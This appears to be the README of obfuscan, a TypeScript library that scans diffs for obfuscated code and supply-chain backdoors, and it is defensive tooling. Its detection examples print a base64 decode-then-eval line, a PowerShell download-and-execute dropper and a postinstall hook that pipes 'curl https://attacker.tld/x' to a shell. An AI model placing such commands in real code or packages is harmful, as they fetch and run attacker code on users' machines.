Detect obfuscated code and likely backdoors in files or text. Multi-language. Embeddable. Diff-aware. Pure TypeScript.
obfuscan reads a unified diff (or an explicit file list) and returns findings that flag the two patterns nearly every supply-chain attack relies on:
- Obfuscation — code deliberately hard for a human to read: high-entropy string blobs, encoded payload arrays, bidi/homoglyph identifiers, machine-generated identifier names.
- Dynamic / install-time execution — code with the means to run attacker-controlled bytes:
eval,Function,Invoke-Expression,pickle.loads,Reflection.Assembly.Load,postinstallhooks,curl … | sh, etc.
When the two combine — a decoder feeding a sink — that's the highest-precision malware shape across every language we've tested. obfuscan flags it.
$ obfuscan scan diff.patch
src/loader.ts:42:0 BLOCK [obf.decode-then-exec.typescript]
Decoded data is being executed via a dynamic sink.
> eval(Buffer.from(_0x4f3a[1], 'base64').toString())
src/loader.ts:11:0 WARN [obf.encoded-array-fingerprint]
Found 40 encoded-looking string literals (100% of literals).
package.json:23:5 BLOCK [obf.manifest-install-script]
postinstall hook fetches a URL and pipes the result to a shell.
3 findings · 2 block · 1 warn
Existing tools each cover a slice:
- Semgrep — generic AST patterns, but no entropy/data-flow and not focused on obfuscation.
- Bandit / njsscan — single-language.
- Apiiro PRevent — Python runtime, GitHub-Action-shaped, not a library.
- Datadog GuardDog — scans published packages, not PRs.
- Socket.dev / Snyk — closed source SaaS.
The gap obfuscan fills: a TypeScript-native, embeddable, multi-language, diff-aware detector. Drop it into any Node tool — a Git client, a Husky hook, a VS Code extension, a custom GitHub Action, a CI script — and get findings on the lines that actually changed.
npm install @obfuscan/core @obfuscan/rules
# or
pnpm add @obfuscan/core @obfuscan/rulesThe core package ships the engine; rules ships language configs and tree-sitter query assets, not parser grammars. Hosts that want parser-backed custom detectors provide their own grammars via RuleSet.loadGrammar() / GrammarHandle.parse(). We use SemVer for the engine and CalVer (2026.04.0) for the rules.
@obfuscan/core loads language configs from @obfuscan/rules by default, so normal usage is just installing both packages.
import { scan } from "@obfuscan/core";
import * as fs from "node:fs/promises";
const result = await scan(
{ diff: await fs.readFile("pr.diff", "utf8") },
{ fileResolver: (p) => fs.readFile(p, "utf8") },
);You can also load a custom rules directory:
import { loadRuleSet, scan } from "@obfuscan/core";
import * as fs from "node:fs/promises";
const rules = await loadRuleSet({
languageDir: "./my-rules/languages",
queryDir: "./my-rules/queries",
});
const result = await scan(
{ paths: ["src/file.ts"] },
{
fileResolver: (p) => fs.readFile(p, "utf8"),
rules,
},
);Notes:
@obfuscan/coreuses SemVer.@obfuscan/rulesuses CalVer (YYYY.MM.PATCH) and can update independently.- Rule config schema:
packages/rules/languages/_schema.json
import { scan } from "@obfuscan/core";
import * as fs from "node:fs/promises";
const result = await scan(
{ diff: await fs.readFile("pr.diff", "utf8") },
{ fileResolver: (path) => fs.readFile(path, "utf8") },
);
for (const f of result.findings) {
if (f.severity === "block") {
console.error(`${f.file}:${f.line} BLOCK [${f.ruleId}] ${f.reason}`);
}
}- Decode-then-execute, the canonical malware shape:
eval(Buffer.from(_0x4f3a[1], 'base64').toString())
- String-array obfuscator output (verbatim from the 2026 axios compromise):
var _0x4f3a = ['dGVzdA==', 'aGVsbG8=', /* …128 more… */];
- PowerShell network-then-exec droppers:
IEX (New-Object Net.WebClient).DownloadString($url)
curl | shin install hooks:"postinstall": "curl https://attacker.tld/x | sh"
- Trojan Source bidi attacks (any language with Unicode source).
- Pickle / Marshal / unserialize on untrusted input.
- Setup.py top-level imperative code that fetches and executes at install time.
- build.rs with suspicious network behavior.
- Homoglyph identifiers (Latin/Cyrillic mixing).
The detector list is in docs/detectors.md. See docs/coverage.md for per-language coverage.
Universal detectors run on any readable text file.
Language-aware detectors are currently implemented for:
- Tier 1: JavaScript, TypeScript, Python, PowerShell, Bash, PHP, Ruby
- Tier 2: Go, Rust, C#, Java, Kotlin, Lua, Perl, VBScript
Path-based manifest detectors currently target package.json, setup.py, build.rs, GitHub Actions workflows, and Dockerfile.
See docs/coverage.md for the up-to-date matrix by rule and language.
obfuscan runs a layered pipeline over each file selected by diff or paths input:
input → file context → detectors → suppress/filter → sorted findings
- Layer A — universal, raw text. Shannon entropy on long literals, line length, bidi/homoglyph control chars, encoded-string-array regex. Fires on every language.
- Layer B — language-aware heuristics. Generic detectors routed by detected language id: dynamic execution with non-literals, decode-then-exec, network-then-exec, deserializer usage, suspicious I/O clusters, and related patterns.
- Layer C — manifest/path rules. Specialized detectors for
package.json,setup.py,build.rs,.github/workflows/*, andDockerfile.
Each detector emits findings with a 0–10 score and info / warn / block severity. Findings are then filtered (diff ranges, directives, allowlists), sorted, and returned in ScanResult.
Architecture details: docs/architecture.md.
False positives are inevitable in security tooling. obfuscan ships first-class suppression:
- Path allowlist for vendored / minified / generated code.
- Per-finding suppression keyed by
(ruleId, sha256(snippet)), persisted by hosts in.obfuscan/allowlist.jsonvialoadAllowlist(),saveAllowlist(), andhashSnippet(). - In-source comment suppressions:
// obfuscan-disable-next-line obf.decode-then-exec.
- Static analysis cannot defeat static analysis. xz is the existence proof. The goal is to raise attacker cost and surface unsophisticated attempts — not to prove malice.
- Binary blobs need a separate scanner (YARA, file-magic). obfuscan flags the metadata signal but doesn't analyze byte content.
- Compiled-language and build-system backdoors still need manual review and additional build-focused rules.
- There is no built-in LLM verifier in
@obfuscan/coretoday.
| obfuscan | Semgrep | PRevent | GuardDog | Bandit | |
|---|---|---|---|---|---|
| Embeddable as TS/JS library | ✓ | — | — | — | — |
| Diff/PR-aware | ✓ | partial | ✓ | — | — |
| Multi-language | ✓ (15+ deep, 60+ universal) | ✓ | ✓ (15) | ✓ (3) | — |
| Entropy / data-flow | ✓ | — | ✓ | ✓ | partial |
| Manifest detectors | ✓ | partial | ✓ | ✓ | — |
| Pure offline, no SaaS | ✓ | ✓ | ✓ | ✓ | ✓ |
| Open source | ✓ Apache-2.0 | LGPL/commercial | Apache-2.0 | Apache-2.0 | Apache-2.0 |
Pre-1.0. The detector framework, scoring, suppression, and tier-1/tier-2 language rules are stable. Breaking API changes are batched into minor releases until 1.0; rule changes ship as patch CalVer releases of @obfuscan/rules and never require an engine update.
- Tier-1 language rules (JS/TS, Python, PowerShell, Bash, PHP, Ruby)
- Manifest detectors for npm, PyPI, GitHub Actions, Dockerfile
- Tier-2 language rules (Go, Rust, C#, Java, Kotlin, Lua, Perl, VBScript)
-
@obfuscan/cli1.0 with SARIF output -
@obfuscan/github-action -
@obfuscan/llm-verifyoptional Layer-D package - Reproducible benchmark suite against Datadog malicious-software-packages-dataset
Adding rules is the highest-leverage contribution. Most rule contributions are 3-line PRs to a JSON file. See CONTRIBUTING.md.
Bug reports, false-positive reports, and bypasses welcome — see SECURITY.md for how to report bypasses privately.
obfuscan's detection model is informed by published work from Apiiro (PRevent), Datadog (GuardDog, BewAIre), Phylum, Veracode, and the academic literature on entropy-based malware detection. The public taxonomy of PowerShell obfuscation comes from Daniel Bohannon's Invoke-Obfuscation. Where a specific paper or post directly informed a detector, it is cited inline in the source.
Apache-2.0. See LICENSE.